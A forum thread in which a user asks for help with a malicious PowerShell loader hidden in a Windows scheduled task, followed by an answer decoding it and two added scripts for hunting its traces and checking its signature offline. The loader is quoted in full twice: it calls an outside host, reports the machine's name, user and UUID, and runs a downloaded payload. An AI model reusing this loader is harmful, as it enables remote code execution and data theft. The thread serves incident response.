I have an issue with what I believe to be a virus. It is creating PowerShell scripts in TaskScheduler.
It appears to be running WMIC and powershell.
It creates a task with the following code:
-c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.pp6'+'r1.com';a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
It creates a randomly named file in the C:\Windows\System32\WindowsPowerShell\v1.0 directory (same size and creation date as powershell.exe).
I have blocked the website it is trying to get to, and I have deleted several WMIC 'autoruns' but it keeps changing the DNS entries to 8.8.8.8 and 9.9.9.9.
I am replacing the affected computer, but was wondering if anyone could assist in making the above readable so I might be able to check other machines in the network for traces.
Or if it reveals any information that might prove useful.
Thanks in advance.
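An added hunt script for the "check other machines for traces" part of the question; it is not code from the question or the answer. It is written for Windows PowerShell 5.1, run as administrator, and checks the four traces described above: a scheduled task whose action is an obfuscated powershell -c loader, permanent WMI event subscriptions (what "WMIC autoruns" usually means), an extra executable in the PowerShell v1.0 directory sized like powershell.exe, and DNS client servers set to 8.8.8.8 or 9.9.9.9. The function name, the output shape and the marker list are my choices; the marker strings themselves are taken from the task command line quoted in the question.

```powershell
# Added example, not part of the original question or answer. Windows
# PowerShell 5.1, run elevated. Function name and output shape are mine;
# the indicator strings come from the task command line in the question.
function Find-LoaderTraces {
    $hits = New-Object System.Collections.Generic.List[object]
    function Add-Hit($Where, $What) {
        $hits.Add([pscustomobject]@{ Host = $env:COMPUTERNAME; Where = $Where; What = $What })
    }

    # 1. Scheduled tasks whose action launches powershell with the loader's markers.
    #    Backtick-split cmdlet names (Ne`w-Obj`ect, I`ex) do not occur in legitimate tasks.
    $markers = 'DownloadData', 'RSAParameters', 'VerifyData', 'pp6', 'rep_2021', 'I`ex', 'Ne`w-Obj`ect'
    $pattern = ($markers | ForEach-Object { [regex]::Escape($_) }) -join '|'
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $cmd = "$($action.Execute) $($action.Arguments)"
            if ($cmd -match 'powershell' -and $cmd -match $pattern) {
                Add-Hit "Task $($task.TaskPath)$($task.TaskName)" $cmd
            }
        }
    }

    # 2. Permanent WMI event subscriptions. A CommandLineEventConsumer that
    #    starts powershell is a hit; every __EventFilter is listed for review,
    #    since a clean host normally carries only the SCM Event Log Filter.
    $ns = 'root\subscription'
    foreach ($c in Get-WmiObject -Namespace $ns -Class CommandLineEventConsumer -ErrorAction SilentlyContinue) {
        if ($c.CommandLineTemplate -match ('powershell|' + $pattern)) {
            Add-Hit "WMI consumer $($c.Name)" $c.CommandLineTemplate
        }
    }
    foreach ($flt in Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue) {
        Add-Hit "WMI filter (review) $($flt.Name)" $flt.Query
    }

    # 3. The randomly named copy of powershell.exe in the v1.0 directory:
    #    same length as powershell.exe, and for a straight copy the same hash.
    $psDir  = Join-Path $env:SystemRoot 'System32\WindowsPowerShell\v1.0'
    $psExe  = Get-Item (Join-Path $psDir 'powershell.exe')
    $psHash = (Get-FileHash $psExe.FullName).Hash
    foreach ($f in Get-ChildItem $psDir -File | Where-Object Name -ne 'powershell.exe') {
        if ($f.Length -eq $psExe.Length -or (Get-FileHash $f.FullName).Hash -eq $psHash) {
            Add-Hit "File $($f.FullName)" "$($f.Length) bytes, created $($f.CreationTime)"
        }
    }

    # 4. DNS client servers forced to the public resolvers named in the question.
    #    Weak on its own (many networks use 8.8.8.8 on purpose); it counts
    #    together with the findings above.
    foreach ($dns in Get-DnsClientServerAddress -AddressFamily IPv4 -ErrorAction SilentlyContinue) {
        if ($dns.ServerAddresses | Where-Object { $_ -in ('8.8.8.8', '9.9.9.9') }) {
            Add-Hit "DNS on $($dns.InterfaceAlias)" ($dns.ServerAddresses -join ', ')
        }
    }
    return $hits
}

# One host:
Find-LoaderTraces | Format-Table -AutoSize
# Every host listed in hosts.txt over WinRM (hosts.txt is an assumed inventory file);
# each row carries the remote hostname:
# Invoke-Command -ComputerName (Get-Content .\hosts.txt) -ScriptBlock ${function:Find-LoaderTraces} | Format-Table -AutoSize
```

A host with only a DNS hit and nothing else is probably just configured that way; a host with a matching task, a powershell-launching WMI consumer, or a second powershell.exe under a random name should be treated the same way as the machine in the question.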
The powershell script is straightforward. Contact website, download (encrypted) payload and execute payload (the Iex command).
It looks similar to Trojan.Siggen12.57410
As you can see, the script is just one of the many other things that may have been done.
Here's a quick rundown of the script
Tells powershell to execute the following block of code
function a($u)
$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);
$c=$d.count;
if($c -gt 173)
$b=$d[173..$c];
$p=New-Object Security.Cryptography.RSAParameters;
$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');
$p.Exponent=0x01,0x00,0x01;
$r=New-Object Security.Cryptography.RSACryptoServiceProvider;
$r.ImportParameters($p);
if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171]))))
I`ex(-join[char[]]$b)
Creates a function called a that takes a URL u as a parameter. From the URL it will download some data. If the data is big enough, ignore the lower part and decrypt the "payload". Check if the payload is good, then execute the payload (Iex command).
$url='http://'+'t.pp6'+'r1.com';
a($url+'/a.jsp?rep_20210401?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
This pieces a URL together based on some of your computer settings and calls the above defined function a with that URL.
Anyway, it's likely a lot more is going on than just the script you found. Check the URL I linked above, find an antivirus that will negate the threat to your standards, or better yet wipe and reinstall. If the machines allow remote access, don't forget to check if any accounts were compromised.
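As an added example that is not part of the question or the answer, here is the loader's "check if the payload is good" step re-implemented offline, so a response captured from the C2 (for instance from a proxy log) can be parsed and the stage-2 script read rather than executed. The layout follows straight from the task command line: the first 172 bytes are the base64 text of a 128-byte RSA-1024 signature (SHA-1, PKCS#1 v1.5, which is what RSACryptoServiceProvider.VerifyData checks), byte 172 is a separator the loader skips, and everything from byte 173 on is the PowerShell source that goes to Invoke-Expression. The modulus is the one embedded in the task; the attacker's private key is not available, so the self-test signs a harmless stand-in payload with a throwaway key. Function and variable names are mine.

```powershell
# Added example, not code from the question or the answer. Offline
# re-implementation of the loader's signature gate; names are mine.
# Response layout recovered from the task command line:
#   bytes 0..171    base64 text of the 128-byte RSA-1024 / SHA-1 / PKCS#1 v1.5 signature
#   byte  172       separator, skipped by the loader
#   bytes 173..end  PowerShell source the loader hands to Invoke-Expression

# Public modulus copied from the scheduled task; the exponent 0x01,0x00,0x01 is 65537.
$AttackerModulusB64 = '2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10='

function ConvertFrom-LoaderBlob {
    param(
        [Parameter(Mandatory)][byte[]]$Bytes,     # raw HTTP response body
        [Parameter(Mandatory)][byte[]]$Modulus    # RSA modulus the loader trusts
    )
    if ($Bytes.Count -le 173) { return $null }    # loader does nothing on short responses
    $sig     = [Convert]::FromBase64String((-join [char[]]($Bytes[0..171])))
    $payload = [byte[]]($Bytes[173..($Bytes.Count - 1)])

    $params = New-Object System.Security.Cryptography.RSAParameters
    $params.Modulus  = $Modulus
    $params.Exponent = [byte[]](0x01, 0x00, 0x01)
    $rsa = New-Object System.Security.Cryptography.RSACryptoServiceProvider
    $rsa.ImportParameters($params)
    $sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider

    [pscustomobject]@{
        SignatureValid = $rsa.VerifyData($payload, $sha1, $sig)
        PayloadText    = -join [char[]]$payload    # read it; never Invoke-Expression it
    }
}

# --- self-test with constructed data and a throwaway key (the attacker's private key is unknown) ---
$testKey = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 1024
$pubMod  = $testKey.ExportParameters($false).Modulus
$stage2  = [Text.Encoding]::ASCII.GetBytes("Write-Host 'benign stand-in for stage 2'")
$sha1    = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
$sigB64  = [Convert]::ToBase64String($testKey.SignData($stage2, $sha1))       # 172 chars, like the real one
$blob    = [byte[]]([Text.Encoding]::ASCII.GetBytes($sigB64 + "`n") + $stage2)  # byte 172 is the "\n" separator

$good = ConvertFrom-LoaderBlob -Bytes $blob -Modulus $pubMod
"valid={0} payload={1}" -f $good.SignatureValid, $good.PayloadText            # valid=True ...

# Flip one payload byte: the gate closes and the loader would execute nothing.
$bad = [byte[]]$blob.Clone()
$bad[-1] = [byte]($bad[-1] -bxor 1)
"tampered valid={0}" -f (ConvertFrom-LoaderBlob -Bytes $bad -Modulus $pubMod).SignatureValid   # False

# Against a real capture, trust the attacker's modulus instead of the test key
# (capture.bin is an assumed filename):
# ConvertFrom-LoaderBlob -Bytes ([IO.File]::ReadAllBytes('capture.bin')) `
#     -Modulus ([Convert]::FromBase64String($AttackerModulusB64))
```

Two practical consequences of this gate: you cannot feed the loader a replacement payload by redirecting the blocked domain to your own server, because anything not signed with the attacker's private key is silently discarded, and the modulus itself is a stable indicator that can be searched for across task definitions and WMI consumers even if the domain changes. The query string the loader builds also tells you what left the network: the hostname, the logged-on username and the machine's Win32_ComputerSystemProduct UUID, joined with '*'.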